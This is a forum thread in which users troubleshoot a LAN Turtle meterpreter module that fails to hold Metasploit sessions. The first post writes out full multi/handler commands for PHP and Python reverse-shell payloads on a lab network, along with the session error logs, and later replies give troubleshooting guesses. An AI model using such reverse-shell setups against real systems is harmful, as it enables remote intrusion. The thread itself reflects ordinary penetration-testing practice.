F0X4C1D Posted August 16, 2021 Share Posted August 16, 2021 Hello, It's going to be two days that I try to operate my meterpreter module for my LAN Turtle but so far unsuccessfully. In short my network configuration: my kali linux machine 10.10.10.118, my lan turtle 10.10.10.117. I followed meticulously the video tutorial from Darren here with some prerequisites regardings the metasploit database. msfdb init service postgresql start service postgresql status msfconsole use exploit/multi/handler set PAYLOAD php/meterpreter/reverse_tcp set LHOST 10.10.10.118 set LPORT 4444 set ExitOnSession false show options exploit -j And I got the error below: msf6 exploit(multi/handler) > [*] Sending stage (39282 bytes) to 10.10.10.117 [-] Meterpreter session 1 is not valid and will be closed [*] - Meterpreter session 1 closed. [*] Sending stage (39282 bytes) to 10.10.10.117 [-] Meterpreter session 2 is not valid and will be closed [*] - Meterpreter session 2 closed. [*] Sending stage (39282 bytes) to 10.10.10.117 [-] Meterpreter session 3 is not valid and will be closed [*] - Meterpreter session 3 closed. [*] Sending stage (39282 bytes) to 10.10.10.117 [-] Meterpreter session 4 is not valid and will be closed [*] - Meterpreter session 4 closed. [*] Sending stage (39282 bytes) to 10.10.10.117 I know this tutorial is a little outdated (2017) and the paypload suggested by the module (Help section) is slightly different... so I followed this tutorial. use exploit/multi/handler set PAYLOAD python/meterpreter/reverse_https set SessionExpirationTimeout 604800 set LHOST 10.10.10.118 set LPORT 4444 set ExitOnSession false show options exploit -j And I got the error below: msf6 exploit(multi/handler) > [*] Started HTTPS reverse handler on https://10.10.10.118:4444 [*] https://10.10.10.118:4444 handling request from 10.10.10.117; (UUID: womnpkkv) Staging python payload (39568 bytes) ... [*] https://10.10.10.118:4444 handling request from 10.10.10.117; (UUID: womnpkkv) Staging python payload (39528 bytes) ... [*] https://10.10.10.118:4444 handling request from 10.10.10.117; (UUID: womnpkkv) Staging python payload (39540 bytes) ... [-] Meterpreter session 1 is not valid and will be closed [*] - Meterpreter session 1 closed. [*] https://10.10.10.118:4444 handling request from 10.10.10.117; (UUID: womnpkkv) Staging python payload (39548 bytes) ... [-] Meterpreter session 2 is not valid and will be closed [*] - Meterpreter session 2 closed. [*] https://10.10.10.118:4444 handling request from 10.10.10.117; (UUID: womnpkkv) Staging python payload (39580 bytes) ... [*] https://10.10.10.118:4444 handling request from 10.10.10.117; (UUID: womnpkkv) Staging python payload (39604 bytes) ... [-] Meterpreter session 3 is not valid and will be closed [*] - Meterpreter session 3 closed. [*] https://10.10.10.118:4444 handling request from 10.10.10.117; (UUID: womnpkkv) Staging python payload (39596 bytes) ... [-] Meterpreter session 4 is not valid and will be closed [*] - Meterpreter session 4 closed. When in doubt, I setup a new Kali Linux VM (kali-linux-2021.1-vbox-amd64.ova) to start from scratch, and this time, when I configure to use the payload python/meterpreter/reverse_https, I got this: Link to comment Share on other sites More sharing options...
F0X4C1D Posted August 16, 2021 Author Share Posted August 16, 2021 It opens sessions in loop (I'm not sure to understand why...) but nevermind, I tried to open a session (session Id 1) in order to use the command shell but it doesn't work... Can you help me? Link to comment Share on other sites More sharing options...
neoWu Posted December 3, 2021 Share Posted December 3, 2021 Hello, i've got exactly the same problem. The Help section in my Turtle told me to use the python/meterpreter/reverse_https. I've done it ! But don't work ! like you. I have tryed all the payloads with reverse_https. I can note than when the module is stopped and disabled, my device continue to receive staging(infinite) ?!? And i have to delete the module to stop it ! I've try to reboot the turtle and flash it, but nothing work. Have you resolved the problem or getting an information since august ? Thanks Link to comment Share on other sites More sharing options...
F0X4C1D Posted December 3, 2021 Author Share Posted December 3, 2021 Nope unfortunately 🙁 Link to comment Share on other sites More sharing options...
dark_pyrro Posted December 3, 2021 Share Posted December 3, 2021 Could be a client side (Turtle) issue, or host side. A bit difficult to say without digging deeper into it. When running the Python based shell component manually on the Turtle, it reports "Unable to connect" even though the Meterpreter host reacts. The dynamically generated URL on the client side doesn't seem to be accepted by the Meterpreter host. Link to comment Share on other sites More sharing options...
dark_pyrro Posted January 26, 2022 Share Posted January 26, 2022 I've come to the conclusion that it's easier (and more related to success) to run a staged payload/binary on the Turtle to get a Meterpreter shell. Note though that this probably requires the later variant of the Turtle with an SD card slot. The older version of the Turtle doesn't have enough storage space to host the payload (at least a linux/mipsbe based binary). Link to comment Share on other sites More sharing options...
sw1m Posted April 23, 2022 Share Posted April 23, 2022 Hi folks, did this ever get resolved? I just spent an hour looking at this and all I get is hundreds of created sessions that them die off. Link to comment Share on other sites More sharing options...
sw1m Posted April 29, 2022 Share Posted April 29, 2022 Anyone at all? I suspect the payload code is different between the hak5 module and the metasploit module. Hence the error Link to comment Share on other sites More sharing options...
Dark Storme Posted September 10, 2023 Share Posted September 10, 2023 I have not had much luck with this either. TBH you won't find useful video's on the turtle beyond getting shell on your turtle with netcat that work. The only support your ever likely to get is "read the docs" The Ducky is a much better option. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.